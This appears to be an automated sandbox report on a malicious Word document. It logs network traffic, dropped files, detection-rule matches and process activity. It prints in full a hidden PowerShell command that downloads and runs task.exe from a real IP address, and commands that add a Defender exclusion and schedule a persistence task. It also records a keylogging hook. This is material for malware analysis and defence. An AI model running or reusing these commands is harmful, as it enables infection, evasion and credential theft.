Source: global traffic | HTTP traffic detected: GET /task.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 173.232.204.89 | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | ASN Name: EONIX-COMMUNICATIONS-ASBLOCK-62904US
Source: Joe Sandbox View | IP Address: 208.91.198.143
Source: Joe Sandbox View | IP Address: 208.91.199.224
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 208.91.199.224:587
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 208.91.199.224:587
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.2
Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.204.89/t
Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.204.89/task.ex
Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.425635089.0000000002D8F000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.204.89/task.exe
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.204.89/task.exePE
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.438810509.0000000003839000.00000004.00000001.sdmp | String found in binary or memory: http://173.232.204.89
Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp | String found in binary or memory: http://173.232.204.89/task.exe
Source: powershell.exe, 00000003.00000002.429782897.00000000001F9000.00000004.00000020.sdmp | String found in binary or memory: http://java.lp
Source: powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: task.exe, 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmp
Source: unknown | DNS traffic detected: queries for: us2.smtp.mailhostbox.com
Source: global traffic | HTTP traffic detected: GET /task.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 173.232.204.89 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /task.exe HTTP/1.1 | Host: 173.232.204.89 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 173.232.204.89 (this entry is repeated 50 times in the report, one per connection)

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\task.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\task.exe
Source: C:\Users\user\AppData\Roaming\task.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary:

Document contains OLE streams with names of living off the land binaries
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | Stream path '_1699369627/\x1Ole10Native' : L}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.l (remainder of the stream is non-printable and is rendered as dots in the report)
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | Stream path '_1699369659/\x1Ole10Native' : <~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|. (remainder of the stream is non-printable and is rendered as dots in the report)
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\task.exe
.NET source code contains very large array initializations
Source: 14.0.task.exe.400000.11.unpack, u003cPrivateImplementationDetailsu003eu007b58494291u002d801Du002d4F82u002dA213u002d350FC89214C0u007d/u0034EFFEBBBu002d9C57u002d41F6u002dB4B3u002d5EB0A7648FCF.cs | Large array initialization: .cctor: array initializer size 12035
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe
Document contains a stream with embedded javascript code
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | Stream path '_1699369627/\x1Ole10Native' : Found JS content: L}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.l (remainder non-printable)
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | Stream path '_1699369659/\x1Ole10Native' : Found JS content: <~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|. (remainder non-printable)
Found suspicious RTF objects
Source: abdtfhgXgeghDp.ScT | Static RTF information: Object: 0 Offset: 000007DAh abdtfhgXgeghDp.ScT
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | OLE indicator application name: unknown
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_002561F8
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_00256208
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_00256448
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_00256458
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_00251DE0
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_003A65D8
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_003AD680
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_003A59C0
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_003A5D08
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_003A2297
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_003A2608
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_003ADE38
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE1298
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE5CE0
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE0048
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE37A0
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BEA930
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BECB00
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE0006
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE8160
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE8950
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_021F0048
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\SzfukVRF.exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\task.exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
Source: C:\Users\user\AppData\Roaming\task.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\task.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\task.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\task.exe | Memory allocated: 76E90000 page execute and read and write
Source: 00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.429522504.0000000000170000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | OLE indicator has summary info: false
Source: task[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: task.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SzfukVRF.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$GO DEL SALDO.doc
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOC@21/27@8/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: C:\Users\user\AppData\Roaming\task.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: (binary buffer, no printable text; 2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: UTF-16 fragment "...uring a WebClient request." (remainder non-printable)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: (binary buffer, no printable text)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: UTF-16 fragment "At line:1 char:47" (remainder non-printable)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: (binary buffer, no printable text; 5 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: UTF-16 fragment "...us\AppData\Roaming\task.exe'" (remainder non-printable)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: (binary buffer, no printable text; 11 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: UTF-16 fragment "At line:1 char:137" (remainder non-printable)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: (binary buffer, no printable text)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......z...............W.............}..v.....]......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....^................W.............}..v....._......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v.....e......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....f................W.............}..v.....g......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.Hk......0...............h.z.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....l................W.............}..v.....l......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......z...............W.............}..v....Hs......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....t................W.............}..v.....t......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....x......0...............h.z.....&.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....Py................W.............}..v.....y......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......z...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....P.................W.............}..v............0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............h.z.....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v....H.......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ..........k......z...............W.............}..v............0...............h.z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v............0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............Ev.k......................W.............}..v....0.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...h.......0...............X.x.....6.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............Ev.k.... .................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0...............X.x.....".......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............Ev.k....h.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................q.k......x...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............Ev.k....h.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................q.k......x...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............Ev.k....h.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'. .......0...............X.x.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............Ev.k......................W.............}..v....X.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................q.k......................W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............Ev.k......................W.............}..v....P.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w................q.k......x...............W.............}..v............0.......................f.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............Ev.k....@.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........q.k......x...............W.............}..v....P.......0...............X.x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ev.k......................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....................u..k....0.x...............W.............}..v.....H......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....I................W.............}..v.....J......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v.....P......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....HQ................W.............}..v.....Q......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.7.............}..v.....U......0.................x.....$.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....V................W.............}..v.....W......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v.....]......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....^................W.............}..v....._......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k......................W.............}..v.....e......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....f................W.............}..v.....g......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.Hk......0.................x.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....l................W.............}..v.....l......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v....Hs......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....t................W.............}..v.....t......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....x......0.................x.....&.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....Py................W.............}..v.....y......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....P.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................x.....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v....H.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......u..k....0.x...............W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v............0.................x.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....L.......................g.......................0.......#.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....L...............................................0.......#.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....L...............................................0......./.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....L...............................................0......./.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....L...............................................0.......;...............|.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....L...............................................0.......;.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......N.......................0.......G...............".......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....L.......................o.......................0.......G.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....L...............................................0.......S.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....L...............................................0.......S.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.........e.x.e.(.P.....L...............................................0......._.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....L...............................................0......._.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....L.......................4.......................0.......k.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....L.......................P.......................0.......k.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....L...............................................0.......w.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L...............................................0.......................l.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L...............................................0...............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....L...............................................0...............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L...............................................0...............................................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................h.......(.P.............................X.......................................................................
                    Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
                    Source: C:\Users\user\AppData\Roaming\task.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
                    Source: C:\Users\user\AppData\Roaming\task.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                    Source: C:\Users\user\AppData\Roaming\task.exe Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
